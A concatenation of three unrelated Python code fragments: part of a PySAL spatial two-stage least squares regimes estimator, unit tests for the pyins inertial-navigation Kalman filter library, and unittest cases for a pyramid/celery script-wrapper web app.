spat_diag=False, vm=False, constant_regi='many',
cols2regi='all', regime_err_sep=True, name_y=None, name_x=None,
cores=False, name_yend=None, name_q=None, name_regimes=None,
name_w=None, name_gwk=None, name_ds=None, summ=True):
n = USER.check_arrays(y, x)
USER.check_y(y, n)
USER.check_weights(w, y)
USER.check_robust(robust, gwk)
USER.check_spat_diag(spat_diag, w)
self.constant_regi = constant_regi
self.cols2regi = cols2regi
self.name_ds = USER.set_name_ds(name_ds)
self.name_regimes = USER.set_name_ds(name_regimes)
self.name_w = USER.set_name_w(name_w, w)
self.name_gwk = USER.set_name_w(name_gwk, gwk)
self.name_y = USER.set_name_y(name_y)
name_yend = USER.set_name_yend(name_yend, yend)
name_q = USER.set_name_q(name_q, q)
self.name_x_r = USER.set_name_x(name_x, x) + name_yend
self.n = n
cols2regi = REGI.check_cols2regi(
constant_regi, cols2regi, x, yend=yend, add_cons=False)
self.regimes_set = REGI._get_regimes_set(regimes)
self.regimes = regimes
USER.check_regimes(self.regimes_set, self.n, x.shape[1])
if regime_err_sep == True and robust == 'hac':
set_warn(
self, "Error by regimes is incompatible with HAC estimation for 2SLS models. Hence, the error by regimes has been disabled for this model.")
regime_err_sep = False
self.regime_err_sep = regime_err_sep
if regime_err_sep == True and set(cols2regi) == set([True]) and constant_regi == 'many':
name_x = USER.set_name_x(name_x, x)
self.y = y
regi_ids = dict(
(r, list(np.where(np.array(regimes) == r)[0])) for r in self.regimes_set)
self._tsls_regimes_multi(x, yend, q, w, regi_ids, cores,
gwk, sig2n_k, robust, spat_diag, vm, name_x, name_yend, name_q)
else:
name_x = USER.set_name_x(name_x, x, constant=True)
q, self.name_q = REGI.Regimes_Frame.__init__(self, q,
regimes, constant_regi=None, cols2regi='all', names=name_q)
x, self.name_x = REGI.Regimes_Frame.__init__(self, x,
regimes, constant_regi, cols2regi=cols2regi, names=name_x)
yend, self.name_yend = REGI.Regimes_Frame.__init__(self, yend,
regimes, constant_regi=None,
cols2regi=cols2regi, yend=True, names=name_yend)
if regime_err_sep == True and robust == None:
robust = 'white'
BaseTSLS.__init__(self, y=y, x=x, yend=yend, q=q,
robust=robust, gwk=gwk, sig2n_k=sig2n_k)
self.title = "TWO STAGE LEAST SQUARES - REGIMES"
if robust == 'ogmm':
_optimal_weight(self, sig2n_k)
self.name_z = self.name_x + self.name_yend
self.name_h = USER.set_name_h(self.name_x, self.name_q)
self.chow = REGI.Chow(self)
self.robust = USER.set_robust(robust)
if summ:
SUMMARY.TSLS(
reg=self, vm=vm, w=w, spat_diag=spat_diag, regimes=True)
def _tsls_regimes_multi(self, x, yend, q, w, regi_ids, cores,
gwk, sig2n_k, robust, spat_diag, vm, name_x, name_yend, name_q):
results_p = {}
"""
for r in self.regimes_set:
if system() != 'Windows':
is_win = True
results_p[r] = _work(*(self.y,x,w,regi_ids,r,yend,q,robust,sig2n_k,self.name_ds,self.name_y,name_x,name_yend,name_q,self.name_w,self.name_regimes))
else:
pool = mp.Pool(cores)
results_p[r] = pool.apply_async(_work,args=(self.y,x,w,regi_ids,r,yend,q,robust,sig2n_k,self.name_ds,self.name_y,name_x,name_yend,name_q,self.name_w,self.name_regimes))
is_win = False
"""
for r in self.regimes_set:
if cores:
pool = mp.Pool(None)
results_p[r] = pool.apply_async(_work, args=(
self.y, x, w, regi_ids, r, yend, q, robust, sig2n_k, self.name_ds, self.name_y, name_x, name_yend, name_q, self.name_w, self.name_regimes))
else:
results_p[r] = _work(*(self.y, x, w, regi_ids, r, yend, q, robust, sig2n_k,
self.name_ds, self.name_y, name_x, name_yend, name_q, self.name_w, self.name_regimes))
self.kryd = 0
self.kr = x.shape[1] + yend.shape[1] + 1
self.kf = 0
self.nr = len(self.regimes_set)
self.vm = np.zeros((self.nr * self.kr, self.nr * self.kr), float)
self.betas = np.zeros((self.nr * self.kr, 1), float)
self.u = np.zeros((self.n, 1), float)
self.predy = np.zeros((self.n, 1), float)
"""
if not is_win:
pool.close()
pool.join()
"""
if cores:
pool.close()
pool.join()
results = {}
self.name_y, self.name_x, self.name_yend, self.name_q, self.name_z, self.name_h = [
], [], [], [], [], []
counter = 0
for r in self.regimes_set:
"""
if is_win:
results[r] = results_p[r]
else:
results[r] = results_p[r].get()
"""
if not cores:
results[r] = results_p[r]
else:
results[r] = results_p[r].get()
self.vm[(counter * self.kr):((counter + 1) * self.kr),
(counter * self.kr):((counter + 1) * self.kr)] = results[r].vm
self.betas[
(counter * self.kr):((counter + 1) * self.kr), ] = results[r].betas
self.u[regi_ids[r], ] = results[r].u
self.predy[regi_ids[r], ] = results[r].predy
self.name_y += results[r].name_y
self.name_x += results[r].name_x
self.name_yend += results[r].name_yend
self.name_q += results[r].name_q
self.name_z += results[r].name_z
self.name_h += results[r].name_h
counter += 1
self.multi = results
self.hac_var = sphstack(x, q)
if robust == 'hac':
hac_multi(self, gwk)
if robust == 'ogmm':
set_warn(
self, "Residuals treated as homoskedastic for the purpose of diagnostics.")
self.chow = REGI.Chow(self)
if spat_diag:
self._get_spat_diag_props(results, regi_ids, x, yend, q)
SUMMARY.TSLS_multi(
reg=self, multireg=self.multi, vm=vm, spat_diag=spat_diag, regimes=True, w=w)
def _get_spat_diag_props(self, results, regi_ids, x, yend, q):
self._cache = {}
x = USER.check_constant(x)
x = REGI.regimeX_setup(
x, self.regimes, [True] * x.shape[1], self.regimes_set)
self.z = sphstack(x, REGI.regimeX_setup(
yend, self.regimes, [True] * yend.shape[1], self.regimes_set))
self.h = sphstack(
x, REGI.regimeX_setup(q, self.regimes, [True] * q.shape[1], self.regimes_set))
hthi = np.linalg.inv(spdot(self.h.T, self.h))
zth = spdot(self.z.T, self.h)
self.varb = np.linalg.inv(spdot(spdot(zth, hthi), zth.T))
def _work(y, x, w, regi_ids, r, yend, q, robust, sig2n_k, name_ds, name_y, name_x, name_yend, name_q, name_w, name_regimes):
y_r = y[regi_ids[r]]
x_r = x[regi_ids[r]]
yend_r = yend[regi_ids[r]]
q_r = q[regi_ids[r]]
x_constant = USER.check_constant(x_r)
if robust == 'hac' or robust == 'ogmm':
robust2 = None
else:
robust2 = robust
model = BaseTSLS(
y_r, x_constant, yend_r, q_r, robust=robust2, sig2n_k=sig2n_k)
model.title = "TWO STAGE LEAST SQUARES ESTIMATION - REGIME %s" % r
if robust == 'ogmm':
_optimal_weight(model, sig2n_k, warn=False)
model.robust = USER.set_robust(robust)
model.name_ds = name_ds
model.name_y = '%s_%s' % (str(r), name_y)
model.name_x = ['%s_%s' % (str(r), i) for i in name_x]
model.name_yend = ['%s_%s' % (str(r), i) for i in name_yend]
model.name_z = model.name_x + model.name_yend
model.name_q = ['%s_%s' % (str(r), i) for i in name_q]
model.name_h = model.name_x + model.name_q
model.name_w = name_w
model.name_regimes = name_regimes
if w:
w_r, warn = REGI.w_regime(w, regi_ids[r], r, transform=True)
set_warn(model, warn)
model.w = w_r
return model
def _optimal_weight(reg, sig2n_k, warn=True):
try:
Hu = reg.h.toarray() * reg.u ** 2
except:
Hu = reg.h * reg.u ** 2
if sig2n_k:
S = spdot(reg.h.T, Hu, array_out=True) / (reg.n - reg.k)
else:
S = spdot(reg.h.T, Hu, array_out=True) / reg.n
Si = np.linalg.inv(S)
ZtH = spdot(reg.z.T, reg.h)
ZtHSi = spdot(ZtH, Si)
fac2 = np.linalg.inv(spdot(ZtHSi, ZtH.T, array_out=True))
fac3 = spdot(ZtHSi, spdot(reg.h.T, reg.y), array_out=True)
betas = np.dot(fac2, fac3)
if sig2n_k:
vm = fac2 * (reg.n - reg.k)
else:
vm = fac2 * reg.n
RegressionProps_basic(reg, betas=betas, vm=vm, sig2=False)
reg.title += " (Optimal-Weighted GMM)"
if warn:
set_warn(
reg, "Residuals treated as homoskedastic for the purpose of diagnostics.")
return
def _test():
import doctest
start_suppress = np.get_printoptions()['suppress']
np.set_printoptions(suppress=True)
doctest.testmod()
np.set_printoptions(suppress=start_suppress)
if __name__ == '__main__':
_test()
import numpy as np
import pysal
db = pysal.open(pysal.examples.get_path('NAT.dbf'), 'r')
y_var = 'HR60'
y = np.array([db.by_col(y_var)]).T
x_var = ['PS60', 'DV60', 'RD60']
x = np.array([db.by_col(name) for name in x_var]).T
yd_var = ['UE60']
yd = np.array([db.by_col(name) for name in yd_var]).T
q_var = ['FP59', 'MA60']
q = np.array([db.by_col(name) for name in q_var]).T
r_var = 'SOUTH'
regimes = db.by_col(r_var)
tslsr = TSLS_Regimes(y, x, yd, q, regimes, constant_regi='many', spat_diag=False, name_y=y_var, name_x=x_var,
name_yend=yd_var, name_q=q_var, name_regimes=r_var, cols2regi=[
False, True, True, True],
sig2n_k=False)
print tslsr.summary
|
|
from numpy.testing import (assert_, assert_allclose, run_module_suite,
assert_equal)
import numpy as np
import pandas as pd
from pyins.filt import (InertialSensor, LatLonObs, VeVnObs, propagate_errors,
FeedforwardFilter, FeedbackFilter, traj_diff,
_refine_stamps, _kalman_correct, correct_traj)
from pyins import earth
from pyins import sim
from pyins.integrate import integrate, coning_sculling, Integrator
from pyins.transform import perturb_ll
def test_InertialSensor():
s = InertialSensor()
assert_equal(s.n_states, 0)
assert_equal(s.n_noises, 0)
assert_equal(len(s.states), 0)
assert_equal(s.P.shape, (0, 0))
assert_equal(s.q.shape, (0,))
assert_equal(s.F.shape, (0, 0))
assert_equal(s.G.shape, (0, 0))
assert_equal(s.output_matrix().shape, (3, 0))
s = InertialSensor(bias=0.1, bias_walk=0.2)
assert_equal(s.n_states, 3)
assert_equal(s.n_noises, 3)
assert_equal(list(s.states.keys()), ['BIAS_1', 'BIAS_2', 'BIAS_3'])
assert_equal(list(s.states.values()), [0, 1, 2])
assert_allclose(s.P, 0.01 * np.identity(3))
assert_equal(s.q, [0.2, 0.2, 0.2])
assert_equal(s.F, np.zeros((3, 3)))
assert_equal(s.G, np.identity(3))
assert_equal(s.output_matrix(), np.identity(3))
s = InertialSensor(scale=0.2, scale_walk=0.3)
assert_equal(s.n_states, 3)
assert_equal(s.n_noises, 3)
assert_equal(list(s.states.keys()), ['SCALE_1', 'SCALE_2', 'SCALE_3'])
assert_equal(list(s.states.values()), [0, 1, 2])
assert_allclose(s.P, 0.04 * np.identity(3))
assert_equal(s.q, [0.3, 0.3, 0.3])
assert_equal(s.F, np.zeros((3, 3)))
assert_equal(s.G, np.identity(3))
assert_equal(s.output_matrix([1, 2, 3]), np.diag([1, 2, 3]))
assert_equal(s.output_matrix([[1, -2, 2], [0.1, 2, 0.5]]),
np.array((np.diag([1, -2, 2]), np.diag([0.1, 2, 0.5]))))
s = InertialSensor(corr_sd=0.1, corr_time=5)
assert_equal(s.n_states, 3)
assert_equal(s.n_noises, 3)
assert_equal(list(s.states.keys()), ['CORR_1', 'CORR_2', 'CORR_3'])
assert_equal(list(s.states.values()), [0, 1, 2])
assert_allclose(s.P, 0.01 * np.identity(3))
q = 0.1 * (2 / 5) ** 0.5
assert_equal(s.q, [q, q, q])
assert_allclose(s.F, -np.identity(3) / 5)
assert_equal(s.G, np.identity(3))
s = InertialSensor(bias=0.1, bias_walk=0.2, scale=0.3, scale_walk=0.4,
corr_sd=0.5, corr_time=10)
assert_equal(s.n_states, 9)
assert_equal(s.n_noises, 9)
assert_equal(list(s.states.keys()),
['BIAS_1', 'BIAS_2', 'BIAS_3', 'SCALE_1', 'SCALE_2',
'SCALE_3', 'CORR_1', 'CORR_2', 'CORR_3'])
assert_equal(list(s.states.values()), np.arange(9))
assert_allclose(s.P, np.diag([0.01, 0.01, 0.01, 0.09, 0.09, 0.09,
0.25, 0.25, 0.25]))
q_corr = 0.5 * (2 / 10) ** 0.5
assert_equal(s.q, [0.2, 0.2, 0.2, 0.4, 0.4, 0.4, q_corr, q_corr, q_corr])
assert_allclose(s.F, np.diag([0, 0, 0, 0, 0, 0, -1/10, -1/10, -1/10]))
assert_equal(s.G, np.identity(9))
H = s.output_matrix([1, 2, 3])
assert_allclose(H, [[1, 0, 0, 1, 0, 0, 1, 0, 0],
[0, 1, 0, 0, 2, 0, 0, 1, 0],
[0, 0, 1, 0, 0, 3, 0, 0, 1]])
H = s.output_matrix([[1, 2, 3], [-1, 2, 0.5]])
assert_allclose(H[0], [[1, 0, 0, 1, 0, 0, 1, 0, 0],
[0, 1, 0, 0, 2, 0, 0, 1, 0],
[0, 0, 1, 0, 0, 3, 0, 0, 1]])
assert_allclose(H[1], [[1, 0, 0, -1, 0, 0, 1, 0, 0],
[0, 1, 0, 0, 2, 0, 0, 1, 0],
[0, 0, 1, 0, 0, 0.5, 0, 0, 1]])
def test_LatLonObs():
traj_point = pd.Series(data={
'lat': 40,
'lon': 30,
'VE': 4,
'VN': -3,
'h': 15,
'p': 0,
'r': 0
})
obs_data = pd.DataFrame(index=[50])
obs_data['lat'] = [40.0001]
obs_data['lon'] = [30.0002]
obs = LatLonObs(obs_data, 10)
ret = obs.compute_obs(55, traj_point)
assert_(ret is None)
z, H, R = obs.compute_obs(50, traj_point)
z_true = [np.deg2rad(-0.0002) * earth.R0 * np.cos(np.deg2rad(40)),
np.deg2rad(-0.0001) * earth.R0]
assert_allclose(z, z_true, rtol=1e-5)
assert_allclose(H, [[1, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0]])
assert_allclose(R, [[100, 0], [0, 100]])
def test_VeVnObs():
traj_point = pd.Series(data={
'lat': 40,
'lon': 30,
'VE': 4,
'VN': -3,
'h': 15,
'p': 0,
'r': 0
})
obs_data = pd.DataFrame(index=[50])
obs_data['VE'] = [3]
obs_data['VN'] = [-2]
obs = VeVnObs(obs_data, 10)
ret = obs.compute_obs(55, traj_point)
assert_(ret is None)
z, H, R = obs.compute_obs(50, traj_point)
assert_allclose(z, [1, -1])
assert_allclose(H, [[0, 0, 1, 0, 0, 0, -2],
[0, 0, 0, 1, 0, 0, -3]])
def test_refine_stamps():
stamps = [2, 2, 5, 1, 10, 20]
stamps = _refine_stamps(stamps, 2)
stamps_true = [1, 2, 4, 5, 7, 9, 10, 12, 14, 16, 18, 20]
assert_equal(stamps, stamps_true)
def test_kalman_correct():
# As the implementation of standard Kalman correction formulas is
# straightforward we use a sanity check, when the correct answer is
# computed without complete formulas.
P0 = np.array([[2, 0], [0, 1]], dtype=float)
x0 = np.array([0, 0], dtype=float)
z = np.array([1, 2])
R = np.array([[3, 0], [0, 2]])
H = np.identity(2)
x_true = np.array([1 * 2 / (2 + 3), 2 * 1 / (1 + 2)])
P_true = np.diag([1 / (1/2 + 1/3), 1 / (1/1 + 1/2)])
x = x0.copy()
P = P0.copy()
_kalman_correct(x, P, z, H, R, None, None)
assert_allclose(x, x_true)
assert_allclose(P, P_true)
x = x0.copy()
P = P0.copy()
_kalman_correct(x, P, z, H, R, np.array([1 / 2, 1 / 3]), None)
x_true = np.array([1 * 2 / (2 + 3) / 2, 2 * 1 / (1 + 2) / 3])
K1 = 0.4 * 1 / 2
K2 = 1 / 3 * 1 / 3
P_true = np.diag([(1 - K1)**2 * 2 + K1**2 * 3,
(1 - K2)**2 * 1 + K2**2 * 2])
assert_allclose(x, x_true)
assert_allclose(P, P_true)
def create_gain_curve(params):
L, F, C = params
def gain_curve(q):
if q > C:
return 0
if F < q <= C:
return L * F * (C - q) / ((C - F) * q)
elif L < q <= F:
return L
else:
return q
return gain_curve
curve = create_gain_curve([0.5, 1, 5])
x = x0.copy()
P = P0.copy()
_kalman_correct(x, P, z, H, R, None, curve)
K1 = 0.4 * 0.5 / (23 / 30)**0.5
K2 = 1/3 * 0.5 / (23 / 30)**0.5
P_true = np.diag([(1 - K1)**2 * 2 + K1**2 * 3,
(1 - K2)**2 * 1 + K2**2 * 2])
assert_allclose(x, [K1 * z[0], K2 * z[1]])
assert_allclose(P, P_true)
def test_propagate_errors():
# This test is complex and hardly a unit test, but it is strong.
# I believe it's better than a formal test.
dt = 0.5
t = 6 * 3600
n_samples = int(t / dt)
lat = np.full(n_samples, 50.0)
lon = np.full(n_samples, 60.0)
alt = np.zeros_like(lat)
h = np.full(n_samples, 10.0)
r = np.full(n_samples, -5.0)
p = np.full(n_samples, 3.0)
traj, gyro, accel = sim.from_position(dt, lat, lon, alt, h, p, r)
gyro_bias = np.array([1e-8, -2e-8, 3e-8])
accel_bias = np.array([3e-3, -4e-3, 2e-3])
gyro += gyro_bias * dt
accel += accel_bias * dt
theta, dv = coning_sculling(gyro, accel)
d_lat = 100
d_lon = -200
d_VE = 1
d_VN = -2
d_h = 0.01
d_p = -0.02
d_r = 0.03
lat0, lon0 = perturb_ll(traj.lat[0], traj.lon[0], d_lat, d_lon)
VE0 = traj.VE[0] + d_VE
VN0 = traj.VN[0] + d_VN
h0 = traj.h[0] + d_h
p0 = traj.p[0] + d_p
r0 = traj.r[0] + d_r
traj_c = integrate(dt, lat0, lon0, VE0, VN0, h0, p0, r0, theta, dv)
error_true = traj_diff(traj_c, traj)
error_linear = propagate_errors(dt, traj, d_lat, d_lon, d_VE, d_VN, d_h,
d_p, d_r, gyro_bias, accel_bias)
error_scale = np.mean(np.abs(error_true))
rel_diff = (error_linear - error_true) / error_scale
assert_allclose(rel_diff.lat, 0, atol=0.1)
assert_allclose(rel_diff.lon, 0, atol=0.1)
assert_allclose(rel_diff.VE, 0, atol=0.1)
assert_allclose(rel_diff.VN, 0, atol=0.1)
assert_allclose(rel_diff.h, 0, atol=0.1)
assert_allclose(rel_diff.p, 0, atol=0.1)
assert_allclose(rel_diff.r, 0, atol=0.1)
def test_FeedforwardFilter():
# Test that the results are reasonable on a static bench.
dt = 1
traj = pd.DataFrame(index=np.arange(1 * 3600))
traj['lat'] = 50
traj['lon'] = 60
traj['VE'] = 0
traj['VN'] = 0
traj['h'] = 0
traj['p'] = 0
traj['r'] = 0
np.random.seed(1)
obs_data = pd.DataFrame(
index=traj.index[::10],
data={
'lat': traj.lat[::10],
'lon': traj.lon[::10]
}
)
obs_data['lat'], obs_data['lon'] = perturb_ll(
obs_data.lat, obs_data.lon,
10 * np.random.randn(obs_data.shape[0]),
10 * np.random.randn(obs_data.shape[0]))
obs = LatLonObs(obs_data, 10)
d_lat = 5
d_lon = -3
d_VE = 1
d_VN = -1
d_h = 0.1
d_p = 0.03
d_r = -0.02
errors = propagate_errors(dt, traj, d_lat, d_lon, d_VE, d_VN,
d_h, d_p, d_r)
traj_error = correct_traj(traj, -errors)
f = FeedforwardFilter(dt, traj, 5, 1, 0.2, 0.05)
res = f.run(traj_error, [obs])
x = errors.loc[3000:]
y = res.err.loc[3000:]
assert_allclose(x.lat, y.lat, rtol=0, atol=10)
assert_allclose(x.lon, y.lon, rtol=0, atol=10)
assert_allclose(x.VE, y.VE, rtol=0, atol=1e-2)
assert_allclose(x.VE, y.VE, rtol=0, atol=1e-2)
assert_allclose(x.h, y.h, rtol=0, atol=1.5e-3)
assert_allclose(x.p, y.p, rtol=0, atol=1e-4)
assert_allclose(x.r, y.r, rtol=0, atol=1e-4)
assert_(np.all(np.abs(res.residuals[0] < 4)))
res = f.run_smoother(traj_error, [obs])
# This smoother we don't need to wait until the filter converges,
# the estimation accuracy is also improved some
x = errors
y = res.err
assert_allclose(x.lat, y.lat, rtol=0, atol=10)
assert_allclose(x.lon, y.lon, rtol=0, atol=10)
assert_allclose(x.VE, y.VE, rtol=0, atol=1e-2)
assert_allclose(x.VE, y.VE, rtol=0, atol=1e-2)
assert_allclose(x.h, y.h, rtol=0, atol=1.5e-3)
assert_allclose(x.p, y.p, rtol=0, atol=1e-4)
assert_allclose(x.r, y.r, rtol=0, atol=1e-4)
assert_(np.all(np.abs(res.residuals[0] < 4)))
def test_FeedbackFilter():
dt = 0.9
traj = pd.DataFrame(index=np.arange(1 * 3600))
traj['lat'] = 50
traj['lon'] = 60
traj['VE'] = 0
traj['VN'] = 0
traj['h'] = 0
traj['p'] = 0
traj['r'] = 0
_, gyro, accel = sim.from_position(dt, traj.lat, traj.lon,
np.zeros_like(traj.lat),
h=traj.h, p=traj.p, r=traj.r)
theta, dv = coning_sculling(gyro, accel)
np.random.seed(0)
obs_data = pd.DataFrame(
index=traj.index[::10],
data={
'lat': traj.lat[::10],
'lon': traj.lon[::10]
}
)
obs_data['lat'], obs_data['lon'] = perturb_ll(
obs_data.lat, obs_data.lon,
10 * np.random.randn(obs_data.shape[0]),
10 * np.random.randn(obs_data.shape[0]))
obs = LatLonObs(obs_data, 10)
f = FeedbackFilter(dt, 5, 1, 0.2, 0.05)
d_lat = 5
d_lon = -3
d_VE = 1
d_VN = -1
d_h = 0.1
d_p = 0.03
d_r = -0.02
lat0, lon0 = perturb_ll(50, 60, d_lat, d_lon)
integrator = Integrator(dt, lat0, lon0, d_VE, d_VN, d_h, d_p, d_r)
res = f.run(integrator, theta, dv, observations=[obs])
error = traj_diff(res.traj, traj)
error = error.iloc[3000:]
assert_allclose(error.lat, 0, rtol=0, atol=10)
assert_allclose(error.lon, 0, rtol=0, atol=10)
assert_allclose(error.VE, 0, rtol=0, atol=1e-2)
assert_allclose(error.VN, 0, rtol=0, atol=1e-2)
assert_allclose(error.h, 0, rtol=0, atol=1.5e-3)
assert_allclose(error.p, 0, rtol=0, atol=1e-4)
assert_allclose(error.r, 0, rtol=0, atol=1e-4)
assert_(np.all(np.abs(res.residuals[0] < 4)))
res = f.run_smoother(integrator, theta, dv, [obs])
error = traj_diff(res.traj, traj)
assert_allclose(error.lat, 0, rtol=0, atol=10)
assert_allclose(error.lon, 0, rtol=0, atol=10)
assert_allclose(error.VE, 0, rtol=0, atol=1e-2)
assert_allclose(error.VN, 0, rtol=0, atol=1e-2)
assert_allclose(error.h, 0, rtol=0, atol=1.5e-3)
assert_allclose(error.p, 0, rtol=0, atol=1e-4)
assert_allclose(error.r, 0, rtol=0, atol=1e-4)
assert_(np.all(np.abs(res.residuals[0] < 4)))
if __name__ == '__main__':
run_module_suite()
|
|
# Copyright 2013 Netherlands eScience Center
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from mock import Mock, patch
from pyramid import testing
from pyramid.exceptions import HTTPNotFound
from pyramid.response import FileResponse
from celery.result import AsyncResult
from script_wrapper.tasks import PythonTask
from script_wrapper.tasks.gpsvis_db import GpsVisDB as TaskMadeByResearcher
from script_wrapper.tasks.calendar import Calendar as TaskMadeByDeveloper
from script_wrapper.validation import Invalid
from script_wrapper.views import Views, TaskNotReady
class TestViews(unittest.TestCase):
def setUp(self):
self.settings = {'task_output_directory': '/tmp/results', }
self.config = testing.setUp(settings=self.settings)
self.request = testing.DummyRequest()
def tearDown(self):
testing.tearDown()
def test_scriptid(self):
self.request.matchdict = {'script': 'plot'}
views = Views(self.request)
self.assertEqual(views.scriptid, 'plot')
def test_tasks_made_by_anyone(self):
views = Views(self.request)
taskMadeByResearcher = TaskMadeByResearcher()
taskMadeByDeveloper = TaskMadeByDeveloper()
views.celery.tasks = {
'plot': taskMadeByResearcher,
'kml': taskMadeByDeveloper,
'celery.chain': 'celery.chain object',
}
tasks = views.tasks()
expected_tasks = {
'plot': taskMadeByResearcher,
'kml': taskMadeByDeveloper,
}
self.assertEqual(tasks, expected_tasks)
def test_tasks_made_by_researcher(self):
views = Views(self.request)
taskMadeByResearcher = TaskMadeByResearcher()
taskMadeByDeveloper = TaskMadeByDeveloper()
views.celery.tasks = {
'plot': taskMadeByResearcher,
'kml': taskMadeByDeveloper,
'celery.chain': 'celery.chain object',
}
tasks = views.tasks(made_by_researcher=True)
expected_tasks = {
'plot': taskMadeByResearcher,
}
self.assertEqual(tasks, expected_tasks)
def test_task(self):
self.request.matchdict = {'script': 'plot'}
views = Views(self.request)
views.celery.tasks = {'plot': 'task1'}
self.assertEqual(views.task(), 'task1')
def test_task_invalidtaskname_notfound(self):
self.request.matchdict = {'script': 'plotblablabla'}
views = Views(self.request)
with self.assertRaises(HTTPNotFound):
views.task()
def test_taskid(self):
self.request.matchdict = {'taskid': 'b3c84d96-4dc7-4532-a864-3573202f202a'}
views = Views(self.request)
self.assertEqual(views.taskid, 'b3c84d96-4dc7-4532-a864-3573202f202a')
def test_task_result(self):
self.request.matchdict['taskid'] = 'b3c84d96-4dc7-4532-a864-3573202f202a'
views = Views(self.request)
mresult = Mock(AsyncResult)
is_ready = True
mresult.ready.return_value = is_ready
views.celery.AsyncResult.return_value = mresult
result = views.task_result()
self.assertEqual(result, mresult)
def test_task_result_must_be_ready(self):
self.request.matchdict['taskid'] = 'b3c84d96-4dc7-4532-a864-3573202f202a'
views = Views(self.request)
mresult = Mock(AsyncResult)
is_ready = True
mresult.ready.return_value = is_ready
views.celery.AsyncResult.return_value = mresult
result = views.task_result(True)
self.assertEqual(result, mresult)
def test_task_result_must_be_ready_but_isnt(self):
self.request.matchdict['taskid'] = 'b3c84d96-4dc7-4532-a864-3573202f202a'
views = Views(self.request)
mresult = Mock(AsyncResult)
is_ready = False
mresult.ready.return_value = is_ready
views.celery.AsyncResult.return_value = mresult
with self.assertRaises(TaskNotReady):
views.task_result(True)
def test_index(self):
views = Views(self.request)
taskMadeByResearcher = TaskMadeByResearcher()
taskMadeByDeveloper = TaskMadeByDeveloper()
views.celery.tasks = {
'plot': taskMadeByResearcher,
'kml': taskMadeByDeveloper,
'celery.chain': 'celery.chain object',
}
result = views.index()
expected_tasks = {
'plot': taskMadeByResearcher,
}
self.assertEqual(result, {'tasks': expected_tasks})
def test_form(self):
self.request.matchdict['script'] = 'plot'
views = Views(self.request)
views.celery.tasks = {'plot': 'task1'}
result = views.form()
self.assertEqual(result, {'task': 'task1'})
def test_jsform(self):
from tempfile import NamedTemporaryFile
formjs = NamedTemporaryFile(suffix='.js')
task = PythonTask()
task.js_form_location = Mock(return_value=formjs.name)
self.request.matchdict['script'] = 'plot'
views = Views(self.request)
views.celery.tasks = {'plot': task}
result = views.jsform()
self.assertIsInstance(result, FileResponse)
self.assertEqual(result.content_type, 'application/javascript')
formjs.close()
@patch('script_wrapper.views.db_url_from_request')
def test_submit(self, dr):
dr.return_value = 'sqlite:///'
self.config.add_route('result', '/{taskid}')
self.request.matchdict['script'] = 'plot'
self.request.json_body = 1234
task = Mock(PythonTask)
task_result = Mock(AsyncResult)
task_result.id = 'b3c84d96-4dc7-4532-a864-3573202f202a'
task.apply_async.return_value = task_result
views = Views(self.request)
views.celery.tasks = {'plot': task}
result = views.submit()
eresult = {'success': True,
'result': '/b3c84d96-4dc7-4532-a864-3573202f202a',
}
self.assertEqual(result, eresult)
task.formfields2taskargs.assert_called_with(1234, 'sqlite:///')
@patch('script_wrapper.views.db_url_from_request')
def test_submit_InvalidQuery(self, dr):
dr.return_value = 'sqlite:///'
self.request.matchdict['script'] = 'plot'
self.request.json_body = 1234
task = Mock(PythonTask)
task.formfields2taskargs.side_effect = Invalid('Invalid query')
views = Views(self.request)
views.celery.tasks = {'plot': task}
result = views.submit()
eresult = {'success': False,
'msg': 'Invalid query'}
self.assertEqual(result, eresult)
@patch('script_wrapper.views.db_url_from_request')
def test_submit_InvalidQueryField(self, dr):
dr.return_value = 'sqlite:///'
self.request.matchdict['script'] = 'kmzgen'
self.request.json_body = {'shape': 'triangle'}
task = Mock(PythonTask)
import colander
shape = colander.SchemaNode(colander.String(),
name='shape',
validator=colander.OneOf(['circle', 'iarrow', 'tarrow']))
exception = colander.Invalid(shape, '"triangle" is not one of circle, iarrow, tarrow')
task.formfields2taskargs.side_effect = exception
views = Views(self.request)
views.celery.tasks = {'kmzgen': task}
result = views.submit()
eresult = {'success': False,
'errors': {'shape': '"triangle" is not one of circle, iarrow, tarrow'},
}
self.assertEqual(result, eresult)
def test_statejson(self):
self.config.add_route('result', '/{script}/{taskid}')
self.request.matchdict['script'] = 'plot'
self.request.matchdict['taskid'] = 'b3c84d96-4dc7-4532-a864-3573202f202a'
views = Views(self.request)
task_result = Mock(AsyncResult)
task_result.id = 'b3c84d96-4dc7-4532-a864-3573202f202a'
task_result.state = 'PENDING'
task_result.ready.return_value = False
task_result.successful.return_value = False
task_result.failed.return_value = False
views.celery.AsyncResult = Mock(return_value=task_result)
result = views.statejson()
result_url = '/plot/b3c84d96-4dc7-4532-a864-3573202f202a'
expected_result = {'state': 'PENDING',
'ready': False,
'success': False,
'failure': False,
'result': result_url}
self.assertDictEqual(result, expected_result)
def test_statehtml(self):
result_url = '/plot/b3c84d96-4dc7-4532-a864-3573202f202a'
state = {'state': 'PENDING',
'success': False,
'failure': False,
'ready': False,
'result': result_url,
'task': 'pythontask',
}
self.request.matchdict['script'] = 'plot'
views = Views(self.request)
views.statejson = Mock(return_value=state)
views.celery.tasks = {'plot': 'pythontask'}
result = views.statehtml()
self.assertDictEqual(result, state)
@patch('os.listdir')
def test_result(self, listdir):
self.config.add_route('result_file', '/{script}/{taskid}/{filename}')
self.request.matchdict['script'] = 'plot'
self.request.matchdict['taskid'] = 'mytaskid'
views = Views(self.request)
task_result = Mock(AsyncResult)
task_result.id = 'mytaskid'
task_result.ready.return_value = True
task_result.failed.return_value = False
views.celery.AsyncResult = Mock(return_value=task_result)
task = PythonTask()
task.name = 'plot'
views.celery.tasks = {'plot': task}
listdir.return_value = ['stderr.txt', 'stdout.txt']
result = views.result()
eresult = {'result': task_result,
'files': {'stderr.txt': '/plot/mytaskid/stderr.txt',
'stdout.txt': '/plot/mytaskid/stdout.txt',
},
'task': task,
'result_html': None,
}
self.assertEqual(result, eresult)
listdir.assert_called_with('/tmp/results/mytaskid')
@patch('os.listdir')
def test_result_nofiles(self, listdir):
self.request.matchdict['script'] = 'plot'
